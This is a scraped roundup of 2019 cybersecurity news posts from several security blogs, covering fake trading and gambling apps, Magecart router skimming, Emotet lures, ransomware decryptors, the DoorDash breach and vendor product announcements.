Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the evolution of EDR to XDR (and why your CISO should care), stock trading app attacks and fake gambling apps. Also, read about how Instagram and the Heyyo dating app exposed its users’ data.

Read on:

Why Should CISOs Care About XDR?

Will the evolution of EDR to XDR meet the challenges we are seeing today? In Trend Micro’s latest Simply Security blog, learn how XDR fills the gaps that EDR can’t, including malicious artifacts that are siloed or missed at the network, cloud and gateway – and why your CISO should care.

Mac Malware that Spoofs Trading App Steals User Information, Uploads it to Website

As the use of stock trading apps continues to rise and gain popularity, cybercriminals continue to create and leverage fake trading apps to steal users’ personal data. Trend Micro found and analyzed a fake stock trading app, which had a malicious malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio.

Instagram Data Leak Exposes Account Information Including Full Names and Phone Numbers

Another day, another security issue for the Facebook family of companies. This time out, an Instagram data leak was discovered, exposing hidden contact information including the real names of millions of Instagram users and their phone numbers.

Gambling Apps Sneak into Top 100: How Hundreds of Fake Apps Spread on iOS App Store and Google Play

Trend Micro found hundreds of fake apps on iOS and Google Play stores, many of which posed as seemingly normal gambling games and were controlled to appear innocuous. Leveraging a “switch” feature, threat actors set the apps to either show or hide the app’s actual content.

Chrome Bug, Not Avid Software, Causes Damage to MacOS File Systems

Researchers have tracked a problem that caused corruption to the file systems of macOS users to a bug in a Google Chrome update after users originally feared it was a problem with Avid Media Composer. Users scrambled to find a fix for the problem, and eventually Google took responsibility for the issue.

From Homes to the Office: Revisiting Network Security in the Age of the IoT

As more businesses take advantage of rapidly developing IoT (Internet of Things) technology and begin adoption for their network environments, the underlying concern for network and data security has grown. In this blog, read about the commonly used features and types of home devices currently on the market, their security risks and Trend Micro’s best practices to defend and mitigate against attacks.

Magecart Web Skimming Group Targets Public Hotspots and Mobile Users

One of the web skimming groups that operate under the Magecart umbrella has been testing the injection of payment card stealing code into websites through commercial routers like those used in hotels and airports. The group has also targeted an open-source JavaScript library called Swiper that is used by mobile websites and apps.

Unsecure Pagers in Vancouver Expose Sensitive Patient Data: What This Means for Enterprises

The nonprofit group Open Privacy Research Society publicized in a press release that the confidential medical and personally identifiable information (PII) of patients across Vancouver, Canada, is being leaked through the paging systems of hospitals in the area. In this article, Trend Micro analyzes the security risks of pager technology.

Microsoft Releases Out-of-Band IE, Defender Security Updates

Microsoft released two out-of-band security patches to address critical issues for Internet Explorer (IE) and Microsoft Defender. While no exploit has been reported, Microsoft stated that an IE zero-day scripting engine flaw has been observed in the wild and advised users to manually update their systems immediately.

Heyyo Dating App Leaked Users’ Personal Data, Photos, Location, More

Online dating app Heyyo has made the same mistake that thousands of companies have made before it — namely, it left a server exposed on the internet without a password. This leaky server, an Elasticsearch instance, exposed the personal details, images, location data, phone numbers, and dating preferences for nearly 72,000 users, which is believed to be the app’s entire userbase.

Emotet Disguises as Downloadable File of Edward Snowden’s New Book to Infect Users

Emotet malware expanded its campaign to bank on the popularity of former CIA contractor and NSA whistleblower Edward Snowden’s bestselling memoir. The cybercriminals behind the campaign sent spam emails containing a Microsoft Word document pretending to be a free “Permanent Record” copy, luring victims to open the malicious document containing Emotet.

Social Engineering Explained: How Criminals Exploit Human Behavior

Social engineering has proven to be a successful way for criminals to get inside your organization using the art of exploiting human psychology, rather than technical hacking techniques. This article breaks down various social engineering techniques and discusses five ways to defend your organization against social engineering.

Are you surprised that fake gambling apps are making it past Apple and Google Play app store reviews? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Fake Apps on iOS and Google Play and Social Media Security Issues appeared first on .

Magecart 5 hacker group targets L7 Routers

IBM researchers observed one of the Magecart groups using a malicious code to inject into commercial-grade layer 7 L7 routers.

IBM X-Force Incident Response and Intelligence Services (IRIS) experts observed that one of the Magecart groups, tracked as MG5, is using malware to inject into commercial-grade L7 routers.

The experts believe the hackers are likely testing malicious code designed for injection into benign JavaScript files loaded by L7 routers that are typically used by airports, casinos, hotels, and resorts. According to IBM, the threat actors are currently targeting users shopping on U.S. and Chinese websites.

The experts discovered that the Magecart hackers are able to inject credit card skimmer into a popular open-source JavaScript library that websites use to ensure wide compatibility with mobile browsing.

we found that MG5 has likely devised an attack scenario in which it could inject its malicious payment card stealing code into a popular open-source JavaScript library. This open-source code is provided as a free, licensed tool designed to help make websites compatible with mobile browsing.” reads the analysis published by IBM.”By infecting that code, MG5 can potentially infect and compromise the data of mobile device users that install booby-trapped apps and then shop online.”

The experts speculate the attackers have prepared code for injection into a specific type of commercial-class L7 router, they pointed out that no vendor compromise has been observed so far.

L7 routers implement both routing and switching capabilities, an attacker that compromises the network devices could potentially perform several malicious activities, such as traffic hijacking.

The router can be installed in the same virtualization server as other business-critical IT infrastructure components, this means that once compromised could be used by hackers for lateral movements.

The Wi-Fi connectivity is usually offered for free in locations such as hotels that prefer to outsource the Wi-Fi service, but most vendors for Wi-Fi service do not support proxying adverts or JavaScript injection.

“Having access to a large number of captive users with very high turnover — such as in the case of airports and hotels — is a lucrative concept for attackers looking to compromise payment data.”continues IBM. “We believe that MG5 aims to find and infect L7 router libraries with malicious code and possibly inject malicious ads that captive users must click on to eventually connect to the internet.”

Attackers can compromise L7 routers to steal guest payment data from the users the browse websites through the compromised network device, they can also inject malicious ads into webpages viewed by all connected guest devices.

IBM experts also believe that the Magecart hackers have infected open-source mobile app code that’s offered to app developers for free.

“Another finding from X-Force IRIS with regards to code being tested by Magecart Group 5 concerns open-source mobile app code that’s offered to app developers for free. The code provides a library-agnostic touch slider to allow developers to build touch galleries for their app projects.” concludes the report.

“MG5 has likely infected this code, corrupting it as its source to ensure that every developer using the slider will end up serving the attackers’ malicious code, leading to the compromise of data belonging to those using the finished product,”.

The report also includes mitigation tips to prevent access to data.

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Magecart 5 hacker group targets L7 Routers appeared first on Security Affairs.

Microsoft Warns of a New Rare Fileless Malware Hijacking Windows Computers

Watch out Windows users! There's a new strain of malware making rounds on the Internet that has already infected thousands of computers worldwide and most likely, your antivirus program would not be able to detect it. Why? That's because, first, it's an advanced fileless malware and second, it leverages only legitimate built-in system utilities and third-party tools to extend its

Cyber News Rundown: Instagram Phishing Campaign

Reading Time: ~ 2 min.

Copyright Phishing Campaign Hits Instagram

Many Instagram accounts were recently compromised after receiving a notice that their accounts would be suspended for copyright infringement if they didn’t complete an objection form within 24 hours. By setting a timeframe, the attackers are hoping that flustered victims would quickly begin entering account credentials into a phony landing page before being redirected to the authentic Instagram login page to appear legitimate.

WordPress Plugin Exploited

Rich Reviews, a vulnerable WordPress plugin that was removed from the main WordPress repository more than six months ago, has been found still active on thousands of websites. This vulnerability allows attackers to download malicious payloads, then redirect victims to phony websites that could further infect their systems. Fortunately, several security companies are working with the plugin’s creators to fix the current vulnerabilities, though these updates won’t reach users until it’s put back on the repository.

Banking Malware Campaign

Hundreds of malware samples have been discovered that target ATMs and can be deployed to obtain sensitive banking information from infected systems. Dtrack, the name of the malware tools, can also be used to steal local machine information, such as keystrokes and browser history, by using known vulnerabilities in network security. This type of attack comes from the Lazarus Group, who have been known to target nations and major financial institutions around the world.

Click2Gov Site Hacked

An online bill paying site used in dozens of cities across the U.S. was recently hacked in at least eight cities, already compromising more than 20,000 individuals from all 50 states. This will be the third breach affecting Click2Gov, all of which used an exploit allowing attackers to gain both remote access to the system and upload any files they choose. Many of the cities that were targeted recently were part of the prior attacks on the Click2Gov portal.

Wyoming Healthcare Hit with Ransomware

Campbell County Health’s computer systems were brought to a halt after suffering a ransomware attack this week. Nearly 1,500 computers were affected and all currently scheduled surgeries and other medical care must be delayed or diverted to another facility. Fortunately, CCH is working quickly to restore all of their systems to normal and determine the exact infection point for the attack.

The post Cyber News Rundown: Instagram Phishing Campaign appeared first on Webroot Blog.

Global Consumers Reject Government-Mandated Encryption Backdoors

Global Consumers Reject Government-Mandated Encryption Backdoors

Global consumers overwhelmingly reject government arguments that encryption backdoors will make them safer from terrorists, according to new research from Venafi.

The security vendor polled over 4100 consumers in the US, UK, France and Germany to better understand their attitudes to government and social media when it comes to data protection.

Law enforcers and governments on both sides of the Atlantic have consistently argued that encrypted services and devices provide a safe space for terrorists and criminals to operate.

In July, US attorney general, William Barr, added his voice to the calls for government-mandated backdoor access to such data in specific circumstances, saying it “can and must be done.”

However, 64% of respondents told Venafi that they don’t believe government access to private data would make society any safer from terrorists. In fact, just 30% said they thought governments can be trusted to protect their personal data, falling to 24% in the US and climbing slightly (to 40%) in the UK.

“Many politicians and law enforcement officials wish to use surveillance tools and backdoors that most consumers associate with authoritarian regimes, not democracies,” argued Venafi VP of security strategy and threat intelligence, Kevin Bocek.

“If we can’t trust governments to protect sensitive personal data, it’s difficult to imagine how they will be able to regulate the private sector effectively.”

The poll’s respondents are joined by IT security professionals and cryptography experts in their views on mandated backdoors.

Nearly three-quarters (73%) of IT security pros told Venafi in March that laws effectively forcing tech companies to insert backdoors in their products would make their nation less secure.

As if that weren’t enough, a group of world-leading cryptography experts last year backed senator Ron Wyden’s demands that the FBI explain the technical basis for its claim that backdoors can be engineered without impacting user security. The Bureau has so far chosen not to respond.

The Venafi poll also revealed that, perhaps unsurprisingly, just 22% of consumers believe social media companies can be trusted to protect their personal and private data.

Emsisoft released a new free decryption tool for the Avest ransomware

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days after the release of WannaCryFake decryptor.

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days ago the researchers also released a free decryptor for the WannaCryFake ransomware.

The Avest ransomware encrypts victim’s files and appends the extension “.ckey().email().pack14” to the filename.

Below the text of the ransom note “!!!Readme!!!Help!!!.txt” that the ransomware drops on the infected systems:

"Problems with your data? Contact us: data1992@protonmail[.]com key: <victim specific>”

The decryption tool could be used by the victims only after they have successfully removed the malware from their system to avoid that the Avest ransomware will repeatedly lock the machine or will encrypt files.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.” reads the user guide published by Emsisoft. “Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.”

Victims of the Avest ransomware can download the decryptor tool here:

https://www.emsisoft.com/ransomware-decryption-tools/avest

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – Avest ransomware, hacking)

The post Emsisoft released a new free decryption tool for the Avest ransomware appeared first on Security Affairs.

Banks Add to Confusion as Scammers Target Thomas Cook Customers

Banks Add to Confusion as Scammers Target Thomas Cook Customers

Experts are urging Thomas Cook customers not to respond to unsolicited messages in the wake of the UK travel company’s bankruptcy, as scammers are trying to harvest their bank details.

The 178-year-old firm collapsed on Monday, leaving a £3bn black hole in its balance sheet and 150,000 holidaymakers stranded abroad.

However, like any high-profile incident, scammers have been jumping on the news to try and part consumers with their cash.

Reports soon emerged of customers being cold called by individuals claiming to work for a company ‘refund agent’ and requesting their bank or card details to reimburse them.

Adding to the confusion, UK banks have been sending unsolicited text messages about the bankruptcy to customers, some of which contain links and a phone number.

According to tweets cited by consumer rights group Which? some of the messages were sent to individuals who hadn’t even booked holidays with Thomas Cook, adding to the sense that they may be a scam.

“We’ve heard worrying stories of criminals trying to scam people affected by the collapse of Thomas Cook, so while the messages being sent by some banks might be well-meaning, this flawed approach will only be adding to the confusion customers are facing,” said Which? consumer rights expert, Adam French.

“Our advice is to ignore unsolicited calls and texts, and avoid sharing your card or bank details. Anyone looking to claim back the cost of their flight through their debit or credit card provider should contact their bank directly themselves.”

In the wake of the travel agent’s collapse, Action Fraud urged consumers to be vigilant about potential scams and to not click on links in unexpected messages.

“Legitimate organizations will never contact you out of the blue and ask for your PIN, card details, or full banking passwords. If you get a call or message asking for these, it’s a scam,” the UK’s national fraud reporting center added.

“Remember, your bank or the police will never ask you to transfer money out of your account, or ask you to hand over cash for safe-keeping.”

DoorDash Breach Exposes 4.9 Million Users’ Personal Data

Do you use DoorDash frequently to order your food online? If yes, you are highly recommended to change your account password right now immediately. DoorDash—the popular on-demand food-delivery service—today confirmed a massive data breach that affects almost 5 million people using its platform, including its customers, delivery workers, and merchants as well. DoorDash is a San

DoorDash Breach Exposes Data on Nearly Five Million Users

DoorDash Breach Exposes Data on Nearly Five Million Users

US food delivery service DoorDash is in the process of notifying its customers after discovering a data breach affecting millions of consumers.

The firm claimed in a notice published yesterday that an unauthorized party managed to access data on 4.9 million customers.

“Earlier this month, we became aware of unusual activity involving a third-party service provider,” it said. “We immediately launched an investigation and outside security experts were engaged to assess what occurred. We were subsequently able to determine that an unauthorized third party accessed some DoorDash user data on May 4, 2019.”

Users who registered with the platform on or before April 5 2018 are said to be affected. Email addresses, delivery addresses, order history, phone numbers and salted and hashed passwords were stolen, as well as the last four digits of some users’ payment cards.

The last four digits of bank account numbers belonging to some of the firm’s restaurant clients and delivery drivers were also taken, along with the driver’s license numbers of 100,000 delivery staff.

Despite salting and hashing passwords, the firm is advising users to reset their credentials for the site.

Experts were quick to criticize the firm: despite its efforts to encrypt passwords, the stolen data could be used in follow-on attacks, argued Lucy Security CEO, Colin Bastable.

“In the race to grab market share, businesses like DoorDash place security too far down the list,” he argued. “Outsourcing data in-sources cyber-insecurity, and consumers pay the price of a carelessly clicked email phishing link or a targeted spear-phishing attack."

DoorDash is no stranger to security incidents. Back in September 2018 it claimed that reports from multiple users of their accounts being hacked were down to credential stuffing.

In response to that incident, it blocked the suspect IP address trying to take over accounts, integrated with the HaveIBeenPwned? breach notification site, and rolled out two-factor authentication.

DoorDash Data Breach exposes data of approximately 5 million users

DoorDash is a San Francisco–based on-demand food delivery service, the company confirmed it has suffered a data breach that exposed roughly 5 million users.

DoorDash announced a data breach that exposed the personal information of 4.9 million consumers, Dashers, and merchants.

According to the data breach notification sent to the impacted customers and the security note published on the website, the incident took place on May 4, 2019, when an unauthorized party was able to gain access to user information, Users and merchants who were registered on the platform after April 5, 2018, were not impacted.

“Earlier this month, we became aware of unusual activity involving a third-party service provider. We immediately launched an investigation and outside security experts were engaged to assess what occurred. We were subsequently able to determine that an unauthorized third party accessed some DoorDash user data on May 4, 2019.” reads the security notice published on the website. “Approximately 4.9 million consumers, Dashers, and merchants who joined our platform on or before April 5, 2018, are affected. Users who joined after April 5, 2018 are not affected.

DoorDash

It is not clear how this data was accessed, but they mention that they noticed unusual activity with a third-party service. It is not known if this data was being hosted by a third-party service provider, if they were subject to a supply-chain attack from this service provider, or the unauthorized access originated from this provider.

Exposed data includes profile information, email addresses, delivery addresses, order history, phone numbers, and hashed and salted passwords. The company also confirmed that for some consumers, Dashers, and merchants, the last four digits of their credit cards or bank accounts were exposed.

“However, full credit card information such as full payment card numbers or a CVV was not accessed. The information accessed is not sufficient to make fraudulent charges on your payment card.” highlighted the company.

The incident also resulted in the exposure of roughly 100,000 driver’s license numbers associated the Dashers.

The company added that it doesn’t believe that user passwords have been compromised, but as precautationary measure recommends users to reset their passwords. Users can change their DoorDash password by visiting https://www.doordash.com/accounts/password/reset/.

At the time of writing it is not clear how data were accessed, the company only mentioned an unusual activity involving a third-party service provider. It is not clear if hackers breached the providers to access DoorDash systems or if DoorDash data was managed by this partner.

Pierluigi Paganini

(SecurityAffairs – DoorDash, hacking)

The post DoorDash Data Breach exposes data of approximately 5 million users appeared first on Security Affairs.

Nearly 5 million DoorDash users, drivers and dealers were exposed personal information

Drivers license numbers of around 100,000 ‘ Dashers ‘ have also been accessed.

DoorDash revealed in a blog post on Thursday that it had information about a third-party unauthorized access to 4.9 million customers.

Customers, drivers and dealers joining the DoorDash platform on or before 5 April 2018 were infringed on 4 May 2019. The firm said that users who joined after 5 April 2018 were not impacted.

Five months were needed to make DoorDash aware of the unauthorized activity. The food supplier said it became conscious of a third-party service provider’s suspected activities previously this month.

The data affected involves profile details, such as names, e-mail addresses, shipping addresses, order history, telephone numbers and hacked passwords, which implies that the real password can be undeciphered from third parties. DoorDash says that.

The last four digits of client payment cards could also be displayed. However, DoorDash has stated that full credit card data such as full card numbers or a CVV has not been accessed.

Some drivers or merchants may also have the last four digits of the bank account numbers exposed, but complete bank account data was not accessed.

DoorDash said the data accessed was not adequate to create fraudulent purchases or withdrawals from banks. 

Roughly 100,000 riders also had access to their driver’s license numbers.

Since the violation was found, DoorDash has taken measures to prevent unauthorized customer access and improve safety on the platform. These measures include adding extra data security protective layers, enhancing security protocols and recruiting external professionals to detect and reject threats.

It has also reached the people impacted.

The firm added that while passwords were not considered compromised, it encourages customers to make them a precautionary measure.

“We deeply regret the frustration and inconvenience that this may cause you. Every member of the DoorDash community is important to us, and we want to assure you that we value your security and privacy,” DoorDash wrote.

Last month, DoorDash bought one of its competitors Caviar in a money combination of $410 million and DoorDash was a favorite stock.

The post Nearly 5 million DoorDash users, drivers and dealers were exposed personal information appeared first on .

How to start achieving visibility in the cloud

As a security executive, you have a curious gig. On one hand, you’re responsible for securing your organization across multiple systems, networks, clouds, and geographies. On the other, your team owns none of those things. Organizing resources in a way that makes visibility possible beyond the data center (assuming you have that to begin with) is hard. That’s because the way you achieve visibility in the cloud, or at the edge, is fundamentally different than … More

The post How to start achieving visibility in the cloud appeared first on Help Net Security.

Should the National Security Council restore the cybersecurity coordinator role?

Former national security advisor John Bolton’s elimination of the cybersecurity coordinator role in May 2018 came as a surprise to many in the cybersecurity industry, especially security professionals that are tasked with securing federal networks, protecting critical infrastructure and providing cybersecurity governance. The role was created to help orchestrate and integrate the government’s cyber policies, make sure federal agencies have adequate cybersecurity funding and coordinate responses to major cybersecurity incidents. Many believe that the abolishment … More

The post Should the National Security Council restore the cybersecurity coordinator role? appeared first on Help Net Security.

Year-over-year malware volume increased by 64%

The most common domains attackers use to host malware and launch phishing attacks include several subdomains of legitimate sites and Content Delivery Networks (CDNs) such as CloudFlare.net, CloudFront.net (which belongs to Amazon), SharePoint and Amazonaws.com, along with legitimate file-sharing websites like my[.]mixtape[.]moe, according to WatchGuard. The report for Q2 2019 also highlights that modules from the popular Kali Linux penetration testing tool made the top ten malware list for the first time. Trojan.GenericKD, which covers … More

The post Year-over-year malware volume increased by 64% appeared first on Help Net Security.

Email and Emotions

Never send an email when you are angry; you will most likely regret it later. Instead, when you are emotional and want to reply to someone, open up an email and write everything you feel, but do not send it. (Be sure there is no name in the TO field so that you do not accidently send it.) After you have vented, save the email and come back an hour later. You only want to reply to any type of emotional situation after you have had time to cool down.

Podcast: Potential problems with the software supply chain for industrial sites

Industrial security pioneer Eric Byres, CEO of aDolus, speaks to software supply chain trust issues and some of the technology his new venture aDolus Inc. is developing to help. In this podcast Andrew Ginter talks to Eric Byres, about potential problems with the software supply chain for industrial sites. They ask how users can trust the firmware and software that they load into their industrial control systems.

The post Podcast: Potential problems with the software supply chain for industrial sites appeared first on Help Net Security.

Why Cybersecurity Pros Need to Be Good Storytellers

Like storytelling, data visualization can be used to provide a narrative about your organization’s cybersecurity posture. Cybersecurity is never a single thing; it is an amalgamation of an often growing list of issues that never seem to end. So in order to make some sense of what it means for the health of your organization, […]… Read More

The post Why Cybersecurity Pros Need to Be Good Storytellers appeared first on The State of Security.

LookingGlass Cyber Solutions unveils software-defined intrusion detection and prevention system

LookingGlass Cyber Solutions, a leader in intelligence-driven risk management, announced the general availability of the LookingGlass Aeonik Security Fabric, a comprehensive, software-defined security architecture, purpose-built to meet the demands of today’s increasingly borderless and elastic network environments. A fundamentally new approach to cybersecurity, Aeonik is a next-generation intrusion detection and prevention system (IDPS) that illuminates all areas of the network to quickly identify, hunt, disrupt, and respond to adversary activities at the moment and point … More

The post LookingGlass Cyber Solutions unveils software-defined intrusion detection and prevention system appeared first on Help Net Security.

Kali Linux best operating system for beginner & professional pentesters 

Kali Linux is the best operating system for beginner & professional pen-testers!     Kali Linux is the best operating system for beginner & professional pen-testers!  Kali Linux is an operating system based on Debian that is developed and maintained by Offensive Security and was designed for penetration testing and digital forensics. Kali Linux was ... Read moreKali Linux best operating system for beginner & professional pentesters 

The post Kali Linux best operating system for beginner & professional pentesters  appeared first on HackingVision.

Hyundai Mobis develops new safety technology that enhances automotive safety devices

Hyundai Mobis announced that it developed “Safety Integrated Control Module” which ensures increased efficiency and safety in operating automotive safety devices. This new development combined two separate ECU(electronic control unit)s for airbags and electronic seatbelts into a single unit. It also receives real-time data from advanced radar sensors enabling enhanced protection of passengers upon different driving situations. In addition, Hyundai Mobis is also finalizing technology for optimally deploying safety devices such as airbags and electronic … More

The post Hyundai Mobis develops new safety technology that enhances automotive safety devices appeared first on Help Net Security.

BullGuard’s 2020 security suite features new Secure Browser and advanced ML capabilities

Multi-award winning consumer cybersecurity company, BullGuard, announced its new 2020 suite of antimalware solutions featuring BullGuard’s new Secure Browser and advanced Machine Learning capabilities. BullGuard’s new 2020 security suite empowers consumers to confidently perform sensitive online transactions in absolute safety and rest assured knowing cyber threats are stopped dead in their tracks. Additionally, the BullGuard 2020 product suite now enables direct integration with BullGuard VPN to ensure users’ total privacy when connecting to unsecured Wi-Fi. … More

The post BullGuard’s 2020 security suite features new Secure Browser and advanced ML capabilities appeared first on Help Net Security.

Emerson and Cisco introduce a new industrial wireless networking solution

Emerson is partnering with Cisco to introduce a next-generation industrial wireless networking solution that fundamentally transforms data management to improve plant productivity, reliability and safety. The new Emerson Wireless 1410S Gateway with the Cisco Catalyst IW6300 Heavy Duty Series Access Point combines the latest in wireless technology with advanced WirelessHART® sensor technology, delivering reliable and highly secure data, even in the harshest industrial environments. To help enable new digital transformation strategies, this industrial networking solution … More

The post Emerson and Cisco introduce a new industrial wireless networking solution appeared first on Help Net Security.

Hypercore Networks and CloudGenix bring cloud-scale economics to the enterprise remote office

Hypercore Networks, global provider of managed WAN, Voice, Security and Monitoring Solutions, announced a managed service provider (MSP) partnership with CloudGenix, the category leader in enterprise SD-WAN. The companies will offer enterprise companies access to modern, cloud-based, branch infrastructure solutions. Fortune 1000 companies, including those in healthcare, retail, manufacturing, finance, banking, hi-tech and hospitality rely on CloudGenix for their remote office WAN needs. Through this partnership, Hypercore Networks will now be able to offer customers … More

The post Hypercore Networks and CloudGenix bring cloud-scale economics to the enterprise remote office appeared first on Help Net Security.